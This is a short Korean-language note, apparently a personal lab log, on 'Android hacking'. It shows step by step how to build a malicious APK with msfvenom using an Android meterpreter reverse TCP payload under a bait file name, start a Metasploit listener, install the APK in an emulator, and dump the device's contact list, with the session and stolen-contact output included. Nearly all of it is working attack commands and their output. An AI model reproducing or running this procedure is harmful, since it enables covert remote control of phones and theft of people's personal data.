# 2 안드로이드 해킹
안드로이드에 악성 프로그램을 만들어서 정보를 빼기
kali 네트워크는 NAT, 포트포워딩은 4444
칼리에 명령어 쓰고
┗ msfvenom -p
┗ android/meterpreter/reverse_tcp LHOST=192.168.0.215 LPORT=4444 -o sexy.apk
프로그램 만들어주기그다음으로 로더 대기
┗ msfconsole -q
┗ use exploit/multi/handler
┗ set payload android/meterpreter/reverse_tcp
┗ set LHOST 192.168.0.205
┗ set LPORT 4444
┗ run
대기 여기서 제일 중요한건 프로그램 악성 코드를 만들었다면 공유 폴더 화면으로 빼야한다 <
nox 플레이어 또는 어디서든 꼭 공유 폴더 기준으로 예:) 독수리 라는 폴더 공유에 넣어놓고
┌──(kali㉿kali)-[/media]
└─$ ls
sexy.apk sf_
┌──(kali㉿kali)-[/media]
└─$ sudo mv sexy.apk sf_/
┌──(kali㉿kali)-[/media]
└─$ ls
sf_
┌──(kali㉿kali)-[/media]
└─$ cd sf_
┌──(kali㉿kali)-[/media/sf_]
└─$ ls
mail서버로그
sexy.apk
레지스트리
레지스트리로그
이벤트로그
포렌식
이런식으로 나올것이다 그럼 녹스에 드래그 끌어다 놓고 <
apk 만든 악성 페이로더 를 옮기고 실행 시킨다
주소록 연락처 저장하고 빼기
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (72530 bytes) to 192.168.0.215
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 192.168.0.215:61022) at 2026-08-06 02:28:55 -0400
┗ meterpreter > dump_contacts
[*] Fetching 3 contacts into list
[*] Contacts list saved to: contacts_dump_20260806023040.txt
┌──(kali㉿kali)-[~]
└─$┗ cat contacts_dump_20260806023040.txt
======================
[+] Contacts list dump
======================
Date: 2026-08-06 02:30:40.336443272 -0400
OS: Android 12 - Linux 5.4.40 (x86_64)
Remote IP: 192.168.0.215
Remote Port: 61022
#1
Name : 미스터꺼드럭
Number : 192.168.0.214
#2
Name : 김옥찌
Number : 587785
#3
Name : 빵빵이
Number : 010-1234-5678
이 노트는 로그인하지 않아도
열람할 수 있습니다.
작성·수정·삭제는
관리자 로그인
후 가능합니다.